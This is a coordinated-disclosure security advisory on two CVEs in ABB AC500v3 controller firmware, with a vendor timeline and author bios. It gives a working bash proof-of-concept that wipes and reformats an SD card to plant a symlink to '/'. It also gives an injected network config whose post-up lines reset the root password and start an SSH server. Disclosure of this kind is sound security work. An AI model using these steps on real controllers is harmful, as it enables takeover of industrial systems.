Multiple Vulnerabilities in ABB AC500v3

This work received funding from the Austrian Research Promotion Agency (FFG) in course of the KIRAS project TestCat (FO999911248) and was supported by AIT Austrian Institute of Technology.

Vendor description

„ABB is a technology leader in electrification and automation, enabling a more sustainable and resource-efficient future. The company’s solutions connect engineering know-how and software to optimize how things are manufactured, moved, powered and operated. Building on more than 140 years of excellence, ABB’s 105,000 employees are committed to driving innovations that accelerate industrial transformation.“

Source: https://global.abb/group/en/about/

Vulnerable versions

AC500v3 / <= 3.7.0.569

Vulnerability overview

1) Directory Traversal via Symlink (CVE-2024-12429)
A directory traversal vulnerability was identified in the file-explorer functionality of the device. An attacker can use this vulnerability to read system-wide files and configuration as user “system”.

2) Privilege Escalation (CVE-2024-12430)
A file which gets executed as “root” is owned by “system”. An attacker can abuse this by injecting arbitrary commands.

Proof of Concept

1) Directory Traversal via Symlink (CVE-2024-12429)

When formatting a sd card to ext4 and creating a symlink to “/”, an attacker can access system critical files via the automation builder file-explorer.

#!/bin/bash
# CyberDanube 2024 <S. Dietz>
# abb ac500 symlink exploit
if [ -z "$1" ]; then
echo "usage: ./abb_ac500_symlink.sh /dev/sdX"
exit 1
fi
if [ "$(id -u)" -ne "0" ]; then
echo "This script must be run as root or with sudo."
exit 1
fi
DISK="$1" 
PART="${DISK}1"
MOUNT_POINT="/mnt/sdcard"
SYMLINK_TARGET="/" 
SYMLINK_NAME="pwned"
umount ${DISK}* 2>/dev/null
# Delete all existing partitions on the disk
(
echo o 
echo w 
) | fdisk "$DISK"
# Create a new partition on /dev/sda
(
echo n 
echo p 
echo 1 
echo 
echo 
echo w 
) | fdisk "$DISK"
partprobe "$DISK"
mkfs.ext4 -F "${PART}"
mkdir -p ${MOUNT_POINT}
mount ${PART} ${MOUNT_POINT}
ln -s ${SYMLINK_TARGET} ${MOUNT_POINT}/${SYMLINK_NAME}
ls -l ${MOUNT_POINT}
umount ${MOUNT_POINT}
echo "Done."

2) Privilege Escalation (CVE-2024-12430)

The file /mnt/sysdata/netconfig/ifs/ETH1 is writable by the user “system”. This file configures the network interface during boot as user “root”. An attacker can modify this file by using 1) and inject arbitrary commands. Our poc changes the root password and starts dropbear.

auto ETH1
iface ETH1 inet static
address 192.168.19.123
netmask 255.255.255.0
post-up ip route add 192.168.19.0/24 dev ETH1 table ETH1
post-up ip rule add from 192.168.19.123/32 table ETH1 priority 100
post-up ip rule add from 0.0.0.0/32 to 192.168.19.0/24 dev ETH1 table ETH1
post-up ip route add default via 192.168.19.254 table ETH1
post-up ip route add default via 192.168.19.254 dev ETH1 metric 0
post-up echo 'root:password' | chpasswd
post-up /etc/init.d/dropbear start

Solution

Update to the latest firmware

Workaround

None

Recommendation

Update to the latest firmware. See recommendations in the ABB Cyber Security Advisory for further information: https://search.abb.com/library/Download.aspx?DocumentID=3ADR011377&LanguageCode=en&DocumentPartId=&Action=Launch

References

https://www.ait.ac.at/themen/cyber-security/projects/testcat

https://projekte.ffg.at/projekt/5122360

Contact Timeline

2024-09-04: Contacting ABB via cybersecurity@ch.abb.com
2024-09-16: Asking if there are any updates regarding the issue.
2024-09-19: Email encryption issue arises. Sending PGP public key again.
2024-09-20: Discussing acknowledgment text and data privacy consent request.
2024-11-04: Asking if there are any updates regarding the issue.
2024-11-07: ABB is requesting a one-month extension of the disclosure deadline.
2024-12-14: ABB requests another extension due to holidays.
2025-01-07: Coordinated release of advisory.

Author(s)

David Blagojevic

David Blagojevic is a Security Researcher at CyberDanube. He is currently engaged in research activities within the fields of firmware emulation and firmware analysis, where he is contributing to the development and advancement of the MEDUSA Firmware Emulation Framework.

Thomas Weber

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the „Austrian Cyber Security Challenge“, where he has won in his category with an impressive number of points.